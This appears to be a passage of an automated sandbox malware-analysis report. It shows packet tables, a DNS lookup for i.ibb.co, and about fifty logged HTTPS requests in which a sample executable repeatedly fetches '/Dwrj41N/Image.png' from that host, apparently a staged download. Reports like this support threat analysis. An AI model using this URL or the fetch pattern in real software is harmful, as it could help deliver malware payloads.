                                                    Oct 31, 2024 19:59:10.585253954 CET49948443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:10.585278034 CET44349948169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:11.832305908 CET49949443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:11.832345963 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:11.832432985 CET49949443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:11.832859039 CET49949443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:11.832870960 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.548533916 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.554217100 CET49949443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:12.554250002 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.757601976 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.757726908 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.757781982 CET49949443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:12.758579016 CET49949443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:12.758594036 CET44349949169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.759733915 CET49950443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:12.759772062 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:12.759828091 CET49950443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:12.760690928 CET49950443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:12.760704041 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:13.455610991 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:13.458396912 CET49950443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:13.458434105 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:13.668889999 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:13.668998957 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:13.669049025 CET49950443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:13.669718981 CET49950443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:13.669739962 CET44349950169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:14.852523088 CET49951443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:14.852574110 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:14.852643013 CET49951443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:14.853286982 CET49951443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:14.853293896 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.520330906 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.522100925 CET49951443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:15.522116899 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.718744993 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.718782902 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.719055891 CET49951443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:15.719822884 CET49951443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:15.719832897 CET44349951169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.721457958 CET49952443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:15.721491098 CET44349952169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:15.721646070 CET49952443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:15.722281933 CET49952443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:15.722295046 CET44349952169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:16.400019884 CET44349952169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:16.407289982 CET49952443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:16.407345057 CET44349952169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:16.407407999 CET49952443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:17.490050077 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:17.490174055 CET44349953169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:17.490344048 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:17.490668058 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:17.490704060 CET44349953169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:18.184087992 CET44349953169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:18.184178114 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:18.203924894 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:18.203946114 CET44349953169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:18.204152107 CET44349953169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:18.206480980 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:18.206516027 CET44349953169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:18.206578016 CET49953443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.223272085 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.223325968 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.223802090 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.223937988 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.223952055 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.919567108 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.919785976 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.922295094 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.922308922 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.922517061 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.924875975 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.924916983 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.925024986 CET44349954169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:19.925036907 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:19.925077915 CET49954443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:21.278477907 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:21.278564930 CET44349955169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:21.278731108 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:21.279222965 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:21.279257059 CET44349955169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:22.203660011 CET44349955169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:22.203763962 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:22.205236912 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:22.205270052 CET44349955169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:22.205506086 CET44349955169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:22.206726074 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:22.206769943 CET44349955169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:22.206844091 CET49955443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:23.082427979 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:23.082474947 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:23.082926035 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:23.083115101 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:23.083127975 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:23.802109003 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:23.802218914 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:25.558662891 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:25.558680058 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:25.559000969 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:25.561357021 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:25.561398983 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:25.561538935 CET44349956169.197.85.95192.168.2.5
                                                    Oct 31, 2024 19:59:25.561541080 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 19:59:25.561821938 CET49956443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:12.706053972 CET49957443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:13.706374884 CET49957443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:15.722009897 CET49957443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:19.737653971 CET49957443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:27.737648010 CET49957443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:35.754791975 CET49958443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:36.768896103 CET49958443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:38.768929005 CET49958443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:42.768903017 CET49958443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:50.768923998 CET49958443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:58.840603113 CET49959443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:00:59.847173929 CET49959443192.168.2.5169.197.85.95
                                                    Oct 31, 2024 20:01:01.847249985 CET49959443192.168.2.5169.197.85.95

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 31, 2024 19:57:40.586313963 CET6335453192.168.2.51.1.1.1
                                                    Oct 31, 2024 19:57:40.593210936 CET53633541.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Oct 31, 2024 19:57:40.586313963 CET192.168.2.51.1.1.10x9bedStandard query (0)i.ibb.coA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Oct 31, 2024 19:57:40.593210936 CET1.1.1.1192.168.2.50x9bedNo error (0)i.ibb.co169.197.85.95A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • i.ibb.co

                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549844169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:41 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.549850169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:42 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.549868169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:45 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.549873169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:46 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.549888169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:49 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.549893169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:50 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.549906169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:53 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.549908169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:53 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.549909169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:56 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.549910169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:57:57 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.549911169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:00 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.549912169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:01 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.549913169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:04 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.549914169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:06 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.549915169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:09 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.549916169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:10 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    16192.168.2.549917169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:13 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    17192.168.2.549918169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:14 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    18192.168.2.549919169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:17 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    19192.168.2.549920169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:18 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    20192.168.2.549921169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:21 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    21192.168.2.549922169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:22 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    22192.168.2.549923169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:25 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    23192.168.2.549924169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:26 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    24192.168.2.549925169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:29 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    25192.168.2.549926169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:30 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    26192.168.2.549927169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:33 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    27192.168.2.549928169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:34 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    28192.168.2.549929169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:37 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    29192.168.2.549930169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:38 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    30192.168.2.549931169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:41 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    31192.168.2.549932169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:42 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    32192.168.2.549933169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:45 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    33192.168.2.549934169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:46 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    34192.168.2.549935169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:49 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    35192.168.2.549936169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:49 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    36192.168.2.549937169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:52 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    37192.168.2.549938169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:53 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.549939169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:56 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.549940169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:57 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.549941169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:58:59 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.549942169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:00 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.549943169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:03 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.549944169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:04 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.549945169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:06 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.549946169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:07 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.549947169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:09 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.549948169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:10 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.549949169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:12 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.549950169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:13 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.549951169.197.85.954435236C:\Users\user\Desktop\TJXpRilNkh.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-31 18:59:15 UTC75OUTGET /Dwrj41N/Image.png HTTP/1.1
                                                    Host: i.ibb.co
                                                    Connection: Keep-Alive


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
